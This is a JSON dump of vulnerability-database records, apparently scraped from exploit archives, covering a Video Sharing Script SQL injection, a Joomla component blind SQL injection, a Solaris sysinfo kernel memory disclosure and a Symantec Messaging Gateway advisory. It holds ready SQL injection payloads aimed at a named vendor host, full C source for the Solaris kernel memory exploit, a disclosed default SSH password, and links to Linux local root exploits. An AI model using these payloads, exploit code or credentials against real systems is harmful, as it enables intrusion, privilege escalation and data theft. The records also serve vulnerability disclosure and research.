{"zdt": [{"lastseen": "2018-02-15T21:15:20", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-01-30T00:00:00", "published": "2017-01-30T00:00:00", "href": "https://0day.today/exploit/description/26839", "id": "1337DAY-ID-26839", "title": "Video Sharing Script 4.94 - SQL Injection Vulnerability", "type": "zdt", "sourceData": "Exploit Title: Video Sharing Script 4.94 \u2013 SQL Injection\r\nDate: 30.01.2017\r\nVendor Homepage: http://itechscripts.com/\r\nSoftware Link: http://itechscripts.com/video-sharing-script/\r\nExploit Author: Kaan KAMIS\r\nContact: iletisim[at]k2an[dot]com\r\nWebsite: http://k2an.com\r\nCategory: Web Application Exploits\r\n \r\nOverview\r\n \r\nVideo Sharing Script v4.94 is the best audio/ video sharing portal. You can easily deploy the software and launch your own video sharing portal in moments.\r\n \r\nType of vulnerability:\r\n \r\nAn SQL Injection vulnerability in Video Sharing Script 4.94 allows attackers to read\r\narbitrary data from the database.\r\n \r\nVulnerability:\r\n \r\nhttp://localhost/video-sharing-script/watch-video.php?v=67d8ab[payload]\r\n \r\nParameter: #1* (URI)\r\n Type: boolean-based blind\r\n Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause\r\n Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' RLIKE (SELECT (CASE WHEN (1170=1170) THEN 0x363764386162 ELSE 0x28 END))-- Niby\r\n \r\n Type: error-based\r\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\r\n Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND (SELECT 2680 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(2680=2680,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Wovm\r\n \r\n Type: AND/OR time-based blind\r\n Title: MySQL >= 5.0.12 AND time-based blind\r\n Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=67d8ab' AND SLEEP(5)-- pcjq\r\n \r\n Type: UNION query\r\n Title: MySQL UNION query (NULL) - 26 columns\r\n Payload: http://video-sharing.itechscripts.com:80/watch-video.php?v=-8184' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627171,0x757277777751656e7948736349597976767448516b784656504a646a72475952546b6d554251736c,0x71786b7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26839"}, {"lastseen": "2018-03-14T00:26:09", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2009-12-18T00:00:00", "published": "2009-12-18T00:00:00", "id": "1337DAY-ID-10321", "href": "https://0day.today/exploit/description/10321", "type": "zdt", "title": "Joomla Component City Portal Blind SQL Injection Vulnerability ", "sourceData": "==============================================================\r\nJoomla Component City Portal Blind SQL Injection Vulnerability \r\n==============================================================\r\n\r\n<------------------- header data start ------------------- >\r\n#########################################################################\r\n# Joomla Component City Portal Blind SQL Injection Vulnerability # \r\n#########################################################################\r\n# author : Fl0riX\r\n \r\n# Script Name : Joomla Component City Portal\r\n \r\n# Bug Type : Blind SQL Injection\r\n \r\n# Infection : Admin login bilgileri al�nabilir.\r\n \r\n# Demo Vuln. :\r\n(-)\r\n� http://server/index.php?option=com_content&task=view&id=36&Itemid=1 and 1=0\r\n(+)\r\n� http://server/index.php?option=com_content&task=view&id=36&Itemid=1 and 1=1\r\n \r\n# Bug Fix Advice : Zararl� karakterler filtrelenmelidir.\r\n \r\n#############################################################\r\n \r\n< ------------------- header data end of ------------------- >\r\n \r\n< -- bug code start -- >\r\n \r\npath/index.php?option=com_content&task=view&id=36&Itemid=[Blind SQL]\r\n \r\n< -- bug code end of -- > \r\n\r\n\r\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/10321"}, {"lastseen": "2018-02-21T01:36:59", "bulletinFamily": "exploit", "description": "Exploit for solaris platform in category local exploits", "modified": "2007-09-01T00:00:00", "published": "2007-09-01T00:00:00", "id": "1337DAY-ID-7724", "href": "https://0day.today/exploit/description/7724", "type": "zdt", "title": "Solaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit", "sourceData": "=============================================================\r\nSolaris 10 x86/sparc sysinfo Kernel Memory Disclosure Exploit\r\n=============================================================\r\n\r\n\r\n\r\n/* 07/2006: public release\r\n * SPARC Solaris 10 without 118833-09\r\n * x86 Solaris 10 without 118855-06\r\n *\r\n * Solaris sysinfo Kernel Memory Disclosure\r\n * By qaaz\r\n */\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <sys/mman.h>\r\n#include <sys/systeminfo.h>\r\n\r\n#define PAGE_COUNT\t1000\r\n\r\nint\tmain(int argc, char *argv[])\r\n{\r\n\tchar\t*buf, *end;\r\n\tint\tpg = PAGE_COUNT, pagesz, bufsz;\r\n\r\n\tfprintf(stderr,\r\n\t\t\"---------------------------------\\n\"\r\n\t\t\" Solaris sysinfo Kmem Disclosure\\n\"\r\n\t\t\" By qaaz\\n\"\r\n\t\t\"---------------------------------\\n\");\r\n\r\n\tif (argc > 1) pg = atoi(argv[1]);\r\n\r\n\tpagesz = getpagesize();\r\n\r\n\tbufsz = (pg + 1) * pagesz;\r\n\tif (!(buf = memalign(pagesz, bufsz))) {\r\n\t\tperror(\"malloc\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tmemset(buf, 0, bufsz);\r\n\tend = buf + (pg * pagesz);\r\n\r\n\tfprintf(stderr, \"-> [ %p .. %p ]\\n\", buf, end);\r\n\tfflush(stderr);\r\n\r\n\tif (mprotect(end, pagesz, PROT_NONE)) {\r\n\t\tperror(\"mprotect\");\r\n\t\treturn -1;\r\n\t}\r\n\r\n\tsysinfo(SI_SYSNAME, buf, 0);\r\n\r\n\twhile (end > buf && end[-1] == 0)\r\n\t\tend--;\r\n\tfprintf(stderr, \"== %d\\n\", (int) (end - buf));\r\n\tfflush(stderr);\r\n\r\n\tif (!isatty(1))\r\n\t\twrite(1, buf, (size_t) (end - buf));\r\n\treturn 0;\r\n}\r\n\r\n\r\n\n# 0day.today [2018-02-20] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/7724"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:46", "bulletinFamily": "software", "description": "\r\n\r\n=======\r\nSummary\r\n=======\r\nName: Symantec Messaging Gateway - SSH with backdoor user account + privilege escalation to root due to very old Kernel\r\nRelease Date: 30 November 2012\r\nReference: NGS00267\r\nDiscoverer: Ben Williams <ben.williams@ngssecure.com>\r\nVendor: Symantec\r\nVendor Reference: \r\nSystems Affected: Symantec Messaging Gateway 9.5.3-3\r\nRisk: High\r\nStatus: Published\r\n\r\n========\r\nTimeLine\r\n========\r\nDiscovered: 18 April 2012\r\nReleased: 18 April 2012\r\nApproved: 29 April 2012\r\nReported: 30 April 2012\r\nFixed: 27 August 2012\r\nPublished: 30 November 2012\r\n\r\n===========\r\nDescription\r\n===========\r\nI. VULNERABILITY\r\n-------------------------\r\nSymantec Messaging Gateway 9.5.3-3 - SSH with backdoor user account + privilege escalation to root due to very old Kernel\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nSymantec Messaging Gateway 9.5.3-3 is the latest version, of their Email Security Appliance\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nThe "admin" SSH account has a restricted shell, and the password is set by the administrator during setup.\r\n\r\nHowever, there is another SSH account "support" which has a default password, which is not changed during installation, and does not seem to be mentioned in the Symantec documentation as far as I can see (Installation Guide, Administration Guide or Command-line Guide). This account has a very easy-to-guess password, but many administrators may not know it exists.\r\n\r\nAdditionally, the Linux Kernel on the appliance has not been updated since late 2007 (almost 5 years) so suffers from multiple privilege escalation issues (as do other old packages on the operating system) so if SSH is accessible to an attacker, it is possible for them to login and escalate to root.\r\n\r\n=================\r\nTechnical Details\r\n=================\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nBoth the install wizard and the documentation prompt the administrator to change the password for the "admin" account, for both the UI and for SSH to the operating system. This admin account can SSH in to the appliance, with the new chosen password, and has a restricted shell environment where only certain application administration commands are possible. \r\n\r\nIt is not possible to login as root. However, there is another account "support" which has a default password of "symantec" which is not mentioned anywhere in the installer or documentation (as far as I can see) and the password is not changed as part of the installation process. This account is able to login to the OS via SSH, and does not have a restricted shell environment.\r\n\r\nAdditionally, the Linux Kernel is very old (2007) so suffers from multiple privilege escalation issues.\r\n\r\n[+] Results for kernel version 2.6.18-274.3.1.2.el5_sms\r\n\r\nPotential exploits:\r\n\r\n* Linux Kernel BCM Local Root Exploit\r\n CVE: CVE-2010-2959\r\n Affects kernels: 2.6.0-2.6.36rc1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/14814\r\n\r\n* Linux Kernel RDS protocol Local Root Exploit\r\n CVE: CVE-2010-3904\r\n Affects kernels: 2.6.0-2.6.36rc8\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15285\r\n\r\n* Linux Kernel econet_sendmsg() - half-nelson Local Root Exploit\r\n CVE: CVE-2010-3848 \r\n Affects kernels: 2.6.0-2.6.36.2 \r\n Exploits: \r\n http://www.exploit-db.com/exploits/17787 \r\n \r\n* Linux Kernel Unknown Local Root Exploit \r\n CVE: CVE-None \r\n Affects kernels: 2.6.18-2.6.20\r\n Exploits:\r\n http://www.exploit-db.com/exploits/10613\r\n\r\n* Linux Kernel sock_sendpage() (Wunderbar Emporium) Local Root Exploit\r\n CVE: CVE-2009-2692\r\n Affects kernels: 2.6.0-2.6.31rc3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9641\r\n http://www.exploit-db.com/exploits/9545\r\n http://www.exploit-db.com/exploits/9479\r\n http://www.exploit-db.com/exploits/9436\r\n http://www.exploit-db.com/exploits/9435\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel pipe.c (MooseCox) Local Root Exploit\r\n CVE: CVE-2009-3547\r\n Affects kernels: 2.6.0-2.6.32rc5\r\n Exploits:\r\n http://www.exploit-db.com/exploits/10018\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel ReiserFS xattr Local Root Exploit\r\n CVE: CVE-2010-1146\r\n Affects kernels: 2.6.0-2.6.34rc3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/12130\r\n\r\n* Linux Kernel vmsplice Local Root Exploit\r\n CVE: CVE-2008-0009\r\n Affects kernels: 2.6.17-2.6.24.1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/5092\r\n http://www.exploit-db.com/exploits/5093\r\n\r\n* Linux Kernel ec_dev_ioctl() - half-nelson Local Root Exploit\r\n CVE: CVE-2010-3850\r\n Affects kernels: 2.6.0-2.6.36.2\r\n Exploits:\r\n http://www.exploit-db.com/exploits/17787\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel ACPI custom_method Local Root Exploit\r\n CVE: CVE-2010-4347\r\n Affects kernels: 2.6.0-2.6.37rc2\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15774\r\n\r\n* Linux Kernel ftruncate()/open() Local Root Exploit\r\n CVE: CVE-2008-4210\r\n Affects kernels: 2.6.0-2.6.22\r\n Exploits:\r\n http://www.exploit-db.com/exploits/6851\r\n\r\n* Linux Kernel put_user() - full-nelson Local Root Exploit\r\n CVE: CVE-2010-4258\r\n Affects kernels: 2.6.0-2.6.37\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel sock_no_sendpage() - full-nelson Local Root Exploit\r\n CVE: CVE-2010-3849\r\n Affects kernels: 2.6.0-2.6.37\r\n Exploits:\r\n http://www.exploit-db.com/exploits/15704\r\n\r\n* Linux Kernel ipc - half-nelson Local Root Exploit\r\n CVE: CVE-2010-4073\r\n Affects kernels: 2.6.0-2.6.37rc1\r\n Exploits:\r\n http://www.exploit-db.com/exploits/17787\r\n\r\n* Linux Kernel SELinux/RHEL5 (Cheddar Bay) Local Root Exploit\r\n CVE: CVE-None\r\n Affects kernels: 2.6.9-2.6.30\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9208\r\n http://www.exploit-db.com/exploits/9191\r\n http://www.grsecurity.net/~spender/enlightenment.tgz\r\n\r\n* Linux Kernel exit_notify() Local Root Exploit\r\n CVE: CVE-2009-1337\r\n Affects kernels: 2.6.0-2.6.29\r\n Exploits:\r\n http://www.exploit-db.com/exploits/8369\r\n\r\n* Linux Kernel system call emulation Local Root Exploit\r\n CVE: CVE-2007-4573\r\n Affects kernels: 2.6.0-2.6.22.7\r\n Exploits:\r\n http://www.exploit-db.com/exploits/4460\r\n\r\n* Linux Kernel set_selection() UTF-8 Off By One Local Root Exploit\r\n CVE: CVE-2009-1046\r\n Affects kernels: 2.6.0-2.6.28.3\r\n Exploits:\r\n http://www.exploit-db.com/exploits/9083\r\n\r\n===============\r\nFix Information\r\n===============\r\n\r\nAn updated version of the software has been released to address the vulnerability:\r\nhttp://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00\r\n\r\nNCC Group Research\r\nhttp://www.nccgroup.com/research\r\n\r\n\r\nFor more information please visit <a href="http://www.mimecast.com">http://www.mimecast.com<br>\r\nThis email message has been delivered safely and archived online by Mimecast.\r\n</a>\r\n", "modified": "2012-12-02T00:00:00", "published": "2012-12-02T00:00:00", "id": "SECURITYVULNS:DOC:28783", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28783", "title": "NGS000267 Technical Advisory: Symantec Messaging Gateway SSH with backdoor user account plus privilege escalation to root due to very old Kernel", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:19", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, etc.", "modified": "2005-04-03T00:00:00", "published": "2005-04-03T00:00:00", "id": "SECURITYVULNS:VULN:4613", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4613", "title": "PHP, ASP, CGI web applications security vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}